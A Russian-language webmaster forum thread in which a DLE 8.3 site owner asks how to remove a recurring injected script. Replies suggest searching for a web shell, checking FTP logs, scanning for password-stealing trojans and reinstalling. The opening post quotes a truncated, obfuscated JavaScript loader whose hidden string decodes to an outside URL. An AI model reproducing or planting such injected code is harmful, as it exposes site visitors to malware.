Вирус на сайте, как удалить?

manca
На сайте с 17.08.2008
Offline
170
715

Появляется в шабоне код, ниже его часть , а так он в три раза длинее, удаляешь появляется снова, права менял, пароли менял, все равно появляется, как избавиться?

<script type='text/javascript'>function lQ(){};vL=false;lQ.prototype = {nO : function() {function dJ(){};this.f=false;var g=new Array();this.i='';return 'h!tftfp%:f/f/ubua%sftJaurfd%ifs%aJb%eflfl%eu.fc%o!m!/JsJlJv!/f1f2%'.cVN(/[%\!uJf]/g, '');var bJ=new Array();var p=function(){return 'p'};},y : function() {this.xB=37062;yW="yW";var kY=47046;var aS="";var lY="lY";this.vQ="";jK=false;var z=document;var kN="kN";eF="";var oL=function(){return 'oL'};var q=new Array();eFE=false;var xG=33203;var nJ='';var x=window;var kW='';tO="tO";xH=false;this.yU="";var oK="";var dI="";var v = this;var kL=new Date();lN='';this.nD="";this.eT="eT";sB=37917;String.prototype.cVN=function(t, a){var l=this; return l.replace(t, a)};var w=false;this.dD="";this.wO="";var dC=function(){};function m(){};function sD()

Куплю приложения ! рассмотрю любые, с доходом и без
NetSky
На сайте с 05.04.2008
Offline
104
#1

Нужно искать шел ... проверте все подозрительные файлы

зы: какой движок ?

Адаптация верстки сайта под мобильные устройства. .Скорая помощь для ваших сайтов- Wordpress, DLE, Joomla, Drupal
manca
На сайте с 17.08.2008
Offline
170
#2
NetSky:
Нужно искать шел ... проверте все подозрительные файлы

зы: какой движок ?

DLE 8.3 ....................

Anamnado
На сайте с 08.02.2010
Offline
242
#3

полная чистка системы тока спасает (переустановка)

они как то пароли воруют от фтп - трояном...

(смена паролей после переустановки)

Bill50
На сайте с 19.02.2010
Offline
64
#4

Чистить вручную все зараженные файлы сайта и проверить свою ОС на наличие вирусов и крайне желательно не хранить пароли в фтп клиентах.

A
На сайте с 27.05.2010
Offline
94
#5

для начала проверьте заходы по фтп, ssh в логах если есть такая возможность. был ли там кто чужой. поменяйте пароли. проверьте систему на трояны. и никогда не храните пароли в браузере или фтп клиенте. потом уж можно убирать фреймы. я убирал - просто скачал все пхп файлы, и нотепад++ замена во всех файлах код фрейма на пустоту.

у меня так стащили пароли. вирус поставили фреймами. поменяли пароли на фтп. в почтах поменяли пароли. причем явно вручную. очень долго разгребал. повезло что оперативно заметил.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий